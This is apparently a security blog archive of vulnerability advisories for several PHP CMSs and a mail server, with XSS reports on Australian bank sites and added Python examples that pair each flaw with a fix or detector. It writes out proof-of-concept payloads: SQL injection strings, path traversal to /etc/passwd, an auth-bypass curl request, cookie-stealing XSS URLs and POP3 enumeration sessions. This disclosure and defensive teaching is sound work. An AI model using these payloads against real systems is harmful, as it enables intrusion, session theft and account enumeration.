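def contains_dotdot_buggy(path: str) -> bool:
    """Constructed illustration of the strpos gotcha: testing the offset for
    truthiness. A match at offset 0 is falsy, so a path that starts with ".."
    is reported as clean, which is exactly the false negative described."""
    return bool(path.find(".."))


def contains_dotdot(path: str) -> bool:
    """Correct form: compare the offset with the not-found sentinel
    (PHP: strpos(...) !== false)."""
    return path.find("..") != -1


def safe_join(base_dir: str, user_path: str) -> Optional[str]:
    """Resolve user_path under base_dir and return the result only if it is
    still inside base_dir; otherwise return None.

    Normalisation here is lexical. When base_dir can contain symlinks, apply
    os.path.realpath to both sides before the prefix check as well.
    """
    if "\x00" in user_path:          # %00 truncation attempts are never valid names
        return None
    base = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(base, user_path.lstrip("/")))
    if candidate == base or candidate.startswith(base + "/"):
        return candidate
    return None


# Allow-list for the language switch: only codes such as "en" or "de_DE".
LANGUAGE_CODE_RE = re.compile(r"^[a-z]{2}(_[A-Z]{2})?$")


def valid_language_code(code: str) -> bool:
    """Accept only a well-formed language code; anything else is rejected
    before it can be used to build an include path."""
    return LANGUAGE_CODE_RE.match(code) is not None


if __name__ == "__main__":
    base = "/var/www/site"
    for p in ["themes/default/style.css",
              "/themes/../../../../../../../../../etc/passwd",
              "../../../../../../../etc/passwd\x00"]:
        print(repr(p), "->", safe_join(base, p))
    print("buggy check on '../etc/passwd':", contains_dotdot_buggy("../etc/passwd"))
    print("fixed check on '../etc/passwd':", contains_dotdot("../etc/passwd"))
    print("language 'en' valid:", valid_language_code("en"))
```

The prefix check uses base + "/" rather than a bare startswith(base) so that a sibling directory such as /var/www/site2 is not mistaken for a child of /var/www/site.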

--- Solution ---
Password protect your feindura installation.
These issues are fixed in the coming 1.1 version.

--- Disclosure time line ---
28-Oct-2010 - Public disclosure
18-Oct-2010 - Vendor response
18-Oct-2010 - Vendor notified through email

--------------------------------------------------------------------------------------------
20100625 - Justanotherhacker.com : Multiple vulnerabilities in maiacms
JAHx103 - http://www.justanotherhacker.com/advisories/JAHx103.txt
--------------------------------------------------------------------------------------------

MaiaCMS is an open source PHP based content management system (CMS). It is designed with simplicity in mind to help you easily build and maintain your web site. It is freely available to everyone.
[ Taken from: http://maiacms.sourceforge.net/ ]

--- Vulnerability description ---
Multiple vulnerabilities exist in maiacms, here are some of them.

Discovered by: Eldar "Wireghoul" Marcussen
Severity: Low
Release: Full disclosure
Affected versions: 0.1

--- SQL injection ---
The index.php script does not properly sanitize the page parameter, resulting in several paths to SQL injection.
PoC:
/index.php?page=1' or 'a'='a

--- Local file inclusion ---
The admin/index.php script does not properly sanitize the com or file parameters, resulting in local file inclusion.
PoC:
/admin/index.php?com=../../../../../../../../etc/passwd%00

--- Authentication bypass ---
Most of the admin pages have a check-and-redirect-to-login snippet to validate the login:
list_pages.php:1:<?php
list_pages.php:2:    require ("../includes/connections.php"); //Includes functions and database connection
list_pages.php:3:    
list_pages.php:4:    if (empty($is_admin)) {
list_pages.php:5:        header("Location: login.php");
list_pages.php:6:    }
However, it does not halt execution after the header redirect. This allows code to be executed past the point of redirection.

PoC:
curl 'http://maiacms.sourceforge.net/admin/list_pages.php?id=1&category=1'

--- Session control ---
The script update_session.php relies on the aforementioned access control weakness and allows the session data to be changed or created directly through an HTTP POST operation.
update_session.php:1:<?php
update_session.php:2:require_once("../includes/connections.php");
update_session.php:3:
update_session.php:4:if (empty($is_admin)) {
update_session.php:5:        header("Location: /admin/login.php");
update_session.php:6:    }
update_session.php:7:    
update_session.php:8:foreach ($_POST as $key => $value) {
update_session.php:9:    $_SESSION[$key] = $value;
update_session.php:10:}
update_session.php:11:
update_session.php:12:$db->Close();
update_session.php:13:?>
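Added example (my own code, not maiacms's): both issues above are patterns that a simple source audit can find, so this Python scans PHP source for a header("Location: ...") call that is not followed by exit or die, and for a loop that copies every key of $_POST, $_GET or $_REQUEST into $_SESSION. The inputs are the two snippets quoted above plus a corrected list_pages.php variant constructed for comparison; the regular expressions are deliberately narrow and will miss other spellings, which is the usual trade-off for a grep-style check.

```python
import re

# Snippets quoted in the advisory, plus a corrected variant for comparison.
LIST_PAGES_PHP = '''<?php
    require ("../includes/connections.php"); //Includes functions and database connection

    if (empty($is_admin)) {
        header("Location: login.php");
    }
'''

LIST_PAGES_FIXED = '''<?php
    require ("../includes/connections.php");

    if (empty($is_admin)) {
        header("Location: login.php");
        exit;
    }
'''

UPDATE_SESSION_PHP = '''<?php
require_once("../includes/connections.php");

if (empty($is_admin)) {
        header("Location: /admin/login.php");
    }

foreach ($_POST as $key => $value) {
    $_SESSION[$key] = $value;
}

$db->Close();
?>
'''

REDIRECT_RE = re.compile(r'\bheader\s*\(\s*["\']Location:', re.IGNORECASE)
TERMINATOR_RE = re.compile(r'\b(exit|die)\b', re.IGNORECASE)
MASS_ASSIGN_RE = re.compile(
    r'foreach\s*\(\s*\$_(POST|GET|REQUEST)\s+as\s+\$(\w+)\s*=>\s*\$\w+\s*\)'
)


def unterminated_redirects(source: str) -> list:
    """1-based line numbers of header("Location: ...") calls that are not
    followed by exit/die on the same line or as the next statement.
    Without the terminator PHP keeps executing the rest of the script."""
    lines = source.splitlines()
    findings = []
    for i, line in enumerate(lines):
        m = REDIRECT_RE.search(line)
        if not m:
            continue
        if TERMINATOR_RE.search(line[m.end():]):
            continue
        following = (l.strip() for l in lines[i + 1:])
        nxt = next((l for l in following if l and not l.startswith("//")), "")
        if not TERMINATOR_RE.match(nxt):
            findings.append(i + 1)
    return findings


def session_mass_assignment(source: str) -> bool:
    """True when every key of a request array is copied into $_SESSION,
    which lets a client set arbitrary session variables."""
    m = MASS_ASSIGN_RE.search(source)
    if not m:
        return False
    key_var = re.escape(m.group(2))
    return re.search(r'\$_SESSION\s*\[\s*\$' + key_var + r'\s*\]\s*=', source) is not None


if __name__ == "__main__":
    for name, src in [("list_pages.php", LIST_PAGES_PHP),
                      ("list_pages.php (fixed)", LIST_PAGES_FIXED),
                      ("update_session.php", UPDATE_SESSION_PHP)]:
        print(f"{name}: unterminated redirects at lines {unterminated_redirects(src)}, "
              f"session mass-assignment={session_mass_assignment(src)}")
```

The corrected variant differs from the original by one line, exit; after the redirect, which is the fix the advisory's description implies. The mass-assignment check only reports the pattern; the remedy is to copy named, validated fields rather than the whole request array.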

--- Solution ---
Wait for the next, non-alpha release.

--- Disclosure time line ---
25-Jun-2010 - Public disclosure
25-Jun-2010 - Vendor notified through email
25-Jun-2010 - Vendor response

--------------------------------------------------------------------------------------------
20100205 - Justanotherhacker.com : HuskiCMS local file inclusion
JAHx102 - http://www.justanotherhacker.com/advisories/JAHx102.txt
--------------------------------------------------------------------------------------------

HuskiCMS
huski CMS effectively places the control of the website back into the hands of you, the site owner. huski CMS is extremely user friendly and has been developed with the lowest denominator in IT knowledge in mind. huski CMS is still a very powerful and flexible system which ensures your site is using the latest technologies such as AJAX, XML, XHTML, and CSS
[ Taken from: http://www.huskicms.com ]


--- Vulnerability description ---
A conditional local file inclusion exists in the image resizing script size.php's i parameter.
The parameter is not filtered and allows arbitrary file inclusion.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Local File Inclusion
Severity: Low
Release: Responsible
CVE: None
Vendor: ASCET Interactive - http://www.ascetinteractive.com
Affected versions:
Unknown

--- Proof of Concept ---
~$ GET 'http://[target]/size.php?i=index.php'
<?php
    header ('Content-Type: text/html; charset=utf-8');
    // Data Includes
    include_once "PHPLib/db_mysql.inc";
    include_once "Data/dbConnection.class.php";
    include_once "Data/dbConfig.class.php";
    include_once "Data/dataAdapter.class.php";
    include_once "Quicksite/Core/domxml.class.php";


    // Quicksite Core Includes
    include_once "Quicksite/Core/all.inc.php";
    
    // Configuration
    include_once "Quicksite/db.config.php";
    include_once "inc/vars.config.php";

    // Initialise the Site
    $site = new Site($_VARS['site']);
    print_r($_SESSION['login']);
    // Initialise the Page
    $page = new Page($site, $_GET['id'], array_merge($_POST, $_GET));

    // Load plugin sources
    $page->loadPluginSources();
   
    // Create the Page
    $page->createPage();
   
    echo $page->Result;
?>


--- Solution ---
Upgrade to a more recent version

--- Disclosure time line ---
05-Feb-2010 - Public disclosure
29-Jan-2010 - Vendor acknowledge vulnerability
28-Jan-2010 - Vendor notified through email
 
--------------------------------------------------------------------------------------------
20100205 - Justanotherhacker.com : Huski retail multiple SQL injection vulnerabilities
JAHx101 - http://www.justanotherhacker.com/advisories/JAHx101.txt
--------------------------------------------------------------------------------------------

Huski Retail
Ascet Interactive offers you a very simple and cost effective method of selling goods and services online. Ascet Interactive provides you with a catalogue targeted at your customers, whether they are retail customers or your dealer network. Imagine being able to save on printing, faxing and administration costs by making your whole product range available at anytime via the Web.
[ Taken from: http://www.ascetinteractive.com/?id=huskiretail ]


--- Vulnerability description ---
The categoryID and productID parameters used in several pages are not sufficiently sanitised, leading to SQL injection.

Discovered by: Eldar "Wireghoul" Marcussen
Type: SQL Injection
Severity: Low
Release: Responsible
CVE: None
Vendor: ASCET Interactive - http://www.ascetinteractive.com
Affected versions:
Unknown

--- Exploit URI ---
http://[target]/[path]/?_action=editProducts&categoryID=[SQLI]

http://[target]/[path]/?_action=showProducts&categoryID=[SQLI]&id=shop

http://[target]/[path]/?_action=showProductDetails&productID=[SQLI]&categoryID=1310&id=shop

http://[target]/[path]/?_action=showProductDetails&productID=22095&categoryID=[SQLI]&id=shop
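The root cause above is a request parameter pasted into SQL text. The following Python/sqlite3 example is added here to show the defect next to its fix; it is not Huski Retail code (the real schema and query are not published) and uses a constructed product table, a constructed tautology in place of [SQLI], and an integer allow-list followed by a bound parameter as the remediation.

```python
import re
import sqlite3

# Constructed sample catalogue standing in for the product tables; the ids
# 22095 and 1310 are the ones that appear in the advisory's example URIs.
SAMPLE_PRODUCTS = [
    (22095, 1310, "Widget"),
    (22096, 1310, "Gadget"),
    (30001, 1400, "Hidden item"),
]


def build_db():
    """In-memory database so the example runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE products (productID INTEGER, categoryID INTEGER, name TEXT)"
    )
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", SAMPLE_PRODUCTS)
    return conn


def show_products_vulnerable(conn, category_id):
    """The pattern behind the advisory: the raw parameter becomes SQL text."""
    sql = (
        "SELECT name FROM products WHERE categoryID = "
        + category_id
        + " ORDER BY productID"
    )
    return [row[0] for row in conn.execute(sql)]


def show_products_safe(conn, category_id):
    """Hardened version: validate the shape, then bind the value."""
    # A catalogue id is a short decimal integer; anything else is rejected
    # before it gets anywhere near the database.
    if not re.fullmatch(r"[0-9]{1,10}", category_id):
        raise ValueError("categoryID must be a positive integer")
    # With a bound parameter the driver sends the value separately from the
    # statement, so it can never change the query's structure.
    rows = conn.execute(
        "SELECT name FROM products WHERE categoryID = ? ORDER BY productID",
        (int(category_id),),
    )
    return [row[0] for row in rows]


def safe_rejects(conn, value):
    """True when the hardened handler refuses the value outright."""
    try:
        show_products_safe(conn, value)
    except ValueError:
        return True
    return False


def demo():
    """Run both handlers against a benign id and a constructed tautology."""
    conn = build_db()
    benign = "1310"
    tamper = "1310 OR 1=1"  # constructed payload standing in for [SQLI]
    return {
        "vuln_benign": show_products_vulnerable(conn, benign),
        "vuln_tamper": show_products_vulnerable(conn, tamper),
        "safe_benign": show_products_safe(conn, benign),
        "safe_tamper_rejected": safe_rejects(conn, tamper),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The vulnerable handler returns every product, including the one in another category, as soon as the parameter carries a tautology; the hardened handler returns only category 1310 for the benign input and refuses the tampered one before any query runs.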


--- Solution ---
Contact the vendor for a fix

--- Disclosure time line ---
05-Feb-2010 - Public disclosure
29-Jan-2010 - Vendor acknowledged vulnerability
28-Jan-2010 - Vendor notified through email

Bank of Queensland XSS


ING XSS

I found an XSS vulnerability in ING's Australian website.
The proof of concept URL used to illustrate the vulnerability is: http://www.ing.com.au/personal/Search.aspx?keyword=%27;alert(document.cookie);test=%27

XSS defacement mirror

Since xssed.org appears to be out of action, there seems to be a need for an active XSS defacement mirror. Some alternatives exist, such as the original XSS disclosure thread on sla.ckers.org or http://bugtraq.byethost22.com/. However, these two sites don't offer the ease of use that xssed.org did for reporting XSS.

If xssed.org cannot be brought back to life, this is what I would like to see in a defacement mirror:

  • Ability to submit post and cookie data or even tamper data xml
  • Automatic screen/browser-shot of the hole
  • Some level of community control to minimize the number of holes that needs to be moderated by admins
  • Automatic notification to the domain owner using postmaster, hostmaster, abuse, etc
  • Status indicator (validated, fixed, etc)
  • Automatic submission and validation by script src=http://xss-mirror/subandvalidate.js?username or similar technique
  • Published statistics; users, vulns, fixed, etc
I understand that there might be a business model involved here and things might not turn out quite like I had wished. Hopefully someone will take up the torch and either bring xssed back to life or start a new site to fill the gap left behind.

Westpac is so far the only bank I have tested which didn't filter their search field. Needless to say, the smell of an XSS casualty brings the zombies around...

The hole has been patched by Westpac now. The URL was:
http://search.westpac.com.au/search/search.cgi?collection=westpac&query=%3Cscript%3Ealert%28String.fromCharCode%2890,111,109,98,105,101,115,32,97,116,101,32,109,121,32,109,111,110,101,121,33%29%29%3C/script%3E&x=0&y=0

Pack of xss

I had some spare time last weekend and decided to go XSS hunting. Yeah I know old news, old vectors, boooring...

Unfortunately, even though XSS is old news in the security community and there are well established techniques to mitigate the attack, it is still ridiculously easy to find XSS vulnerabilities in most websites today. It seems the message isn't getting through.
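The two bank search boxes above reflect the query into different contexts: the ING keyword lands inside a JavaScript string literal, the Westpac query in the HTML body, and each context needs its own encoding. The Python example below is added here to show the reflection pattern and its context-aware fix; it is not code from any of the sites named in the post, the page template is constructed, and the `recover_q` check is an assumption about how a defender would verify that the reflected value stayed a single string.

```python
import html
import json

# The ING proof-of-concept value quoted in the post, decoded from its URL form,
# plus a constructed tag-based payload for the HTML body context.
ING_STYLE = "';alert(document.cookie);test='"
TAG_STYLE = "<script>alert(1)</script>"

SCRIPT_PREFIX = "<script>var q = "
SCRIPT_SUFFIX = ";</script>"


def render_vulnerable(keyword):
    """Search results page that echoes the keyword unencoded in both contexts."""
    return (
        "<h1>Results for " + keyword + "</h1>\n"
        + SCRIPT_PREFIX + "'" + keyword + "'" + SCRIPT_SUFFIX
    )


def js_string_literal(value):
    """Encode a value for a JavaScript string inside an inline <script>.

    json.dumps produces a double-quoted literal with quotes and backslashes
    escaped; replacing "</" with "<\\/" stops the HTML parser, which reads
    the page before the JS engine does, from seeing a premature </script>.
    """
    return json.dumps(value).replace("</", "<\\/")


def render_safe(keyword):
    """Same page with the encoding chosen per output context."""
    return (
        "<h1>Results for " + html.escape(keyword, quote=True) + "</h1>\n"
        + SCRIPT_PREFIX + js_string_literal(keyword) + SCRIPT_SUFFIX
    )


def recover_q(rendered):
    """Parse the q literal back out of the page; None when it was broken open.

    A reflected value that survives a JSON round trip is still one string
    from the browser's point of view, so nothing in it executed.
    """
    start = rendered.index(SCRIPT_PREFIX) + len(SCRIPT_PREFIX)
    end = rendered.rindex(SCRIPT_SUFFIX)
    literal = rendered[start:end].replace("<\\/", "</")
    try:
        return json.loads(literal)
    except ValueError:
        return None


def closing_script_tags(rendered):
    """Count of </script occurrences; the constructed page legitimately has one."""
    return rendered.count("</script")


if __name__ == "__main__":
    for payload in (ING_STYLE, TAG_STYLE):
        print("vulnerable:", recover_q(render_vulnerable(payload)))
        print("safe      :", recover_q(render_safe(payload)))
```

Run against the ING-style value, the vulnerable page's JavaScript no longer parses as a single string literal (the quote closed it and the rest became code), while the safe page gives the original keyword back; against the tag payload, the vulnerable page contains three `</script` sequences and the safe page only its own.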

Get all the details after the break, or use the quick links below

businessday.com.au
carsguide.com.au
conceptart.org
investsmart.com.au
mycareer.com.au
news.com.au
reuters.com
stays.com.au
three.com.au
thebigchair.com.au

--------------------------------------------------------------------------------------------
20091106 - Justanotherhacker.com : Vircom vopmail / modusmail information disclosure
JAHx091 - http://www.justanotherhacker.com/advisories/JAHx091.txt
--------------------------------------------------------------------------------------------

modusMail
All in one email security solution

The modusMail™ mail server provides all-in-one email services, messaging security and spam protection.
[ Taken from: http://www.vircom.com/en/products/modusmail/ ]


--- Vulnerability description ---
A conditional information disclosure exists in older versions of modusMail and Vopmail that reveals whether an email account exists or not. The disclosure is conditional upon the presence of a @ or % character in the username; such usernames are typically used when one mail system handles the email of several domains. If the @ or % character was not present in the username, the POP3 server would request a password before rejecting the login, as opposed to aborting the login attempt after receiving the user portion of the login.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Information disclosure
Severity: Low
Release: Responsible
CVE: None
Vendor: Vircom - http://www.vircom.com
Affected versions:
Modus mail <= 4.4.491
Probably all versions of Vopmail


--- Proof of Concept ---
~$ telnet pop.vircom.com 110
Trying 64.18.73.12...
Connected to gate.vircom.com.
Escape character is '^]'.
+OK modusMail POP3 Server 4.4.491.0 Ready <37819600.1156428713.245@vircom.com>
user nosuchuserhere
+OK nosuchuserhere is welcome here
quit
+OK vircom.com POP3 server signing off (mailbox empty)
Connection closed by foreign host.

~$ telnet pop.vircom.com 110
Trying 64.18.73.12...
Connected to gate.vircom.com.
Escape character is '^]'.
+OK modusMail POP3 Server 4.4.491.0 Ready <36899224.1156429893.504@vircom.com>
user nosuchuser@nosuchhost.com
-ERR nosuchuser@nosuchhost.com not known
user nosuchuser%nosuchhost.com
-ERR nosuchuser%nosuchhost.com not known
quit
+OK vircom.com POP3 server signing off (mailbox empty)
Connection closed by foreign host.
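The transcript above shows the two code paths in the server: a plain username is always welcomed at USER, while a username with a domain separator is looked up immediately and rejected when unknown. The Python example below is added here to model both behaviours and the fix; it is not modusMail code, the account list and credentials are constructed, and `leaks_account_existence` is a check a mail administrator could run against a handler (or, wrapped around a socket, against their own server) to confirm that USER replies no longer depend on whether the mailbox exists.

```python
# Constructed mailbox database; the usernames with @ and % mirror the
# multi-domain login forms described in the advisory.
CREDENTIALS = {
    "alice@example.com": "s3cret-a",
    "bob%example.com": "s3cret-b",
    "carol": "s3cret-c",
}
KNOWN_ACCOUNTS = set(CREDENTIALS)


def reply_status(reply):
    """POP3 replies start with +OK or -ERR; the rest is free text."""
    return reply.split(" ", 1)[0]


def leaky_user_response(username):
    """USER handler modelled on the advisory: lookup happens early for
    domain-qualified names, so an unknown account is rejected before PASS."""
    if ("@" in username or "%" in username) and username not in KNOWN_ACCOUNTS:
        return f"-ERR {username} not known"
    return f"+OK {username} is welcome here"


def uniform_user_response(username):
    """Hardened USER handler: every name is accepted and existence is only
    decided together with the password at PASS."""
    return f"+OK {username} is welcome here"


def uniform_pass_response(username, password, credentials):
    """Hardened PASS handler: unknown user and wrong password share one reply,
    so the pair of commands never distinguishes the two cases."""
    if credentials.get(username) == password:
        return "+OK mailbox locked and ready"
    return "-ERR authentication failed"


def leaks_account_existence(respond, existing, invented):
    """Differential check: does the status of the USER reply differ between a
    real account and an invented one of the same shape?"""
    return reply_status(respond(existing)) != reply_status(respond(invented))


if __name__ == "__main__":
    probes = [("alice@example.com", "nosuchuser@nosuchhost.com"),
              ("carol", "nosuchuserhere")]
    for real, fake in probes:
        print(f"{real!r} vs {fake!r}:",
              "leaky handler leaks =",
              leaks_account_existence(leaky_user_response, real, fake),
              "| uniform handler leaks =",
              leaks_account_existence(uniform_user_response, real, fake))
```

Against the modelled handler the check flags the domain-qualified pair and clears the plain pair, exactly the split seen in the two telnet sessions; against the hardened handler both pairs are clear, and a wrong password for a real account yields the same PASS reply as any name that does not exist.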



--- Solution ---
Upgrade to a more recent version


--- Disclosure time line ---
06-Nov-2009 - Public disclosure
15-Sep-2006 - New version of modusMail mitigates this
26-Aug-2009 - Vendor acknowledged problem
19-Aug-2006 - Vendor notified through email
This weblog is licensed under a Creative Commons License.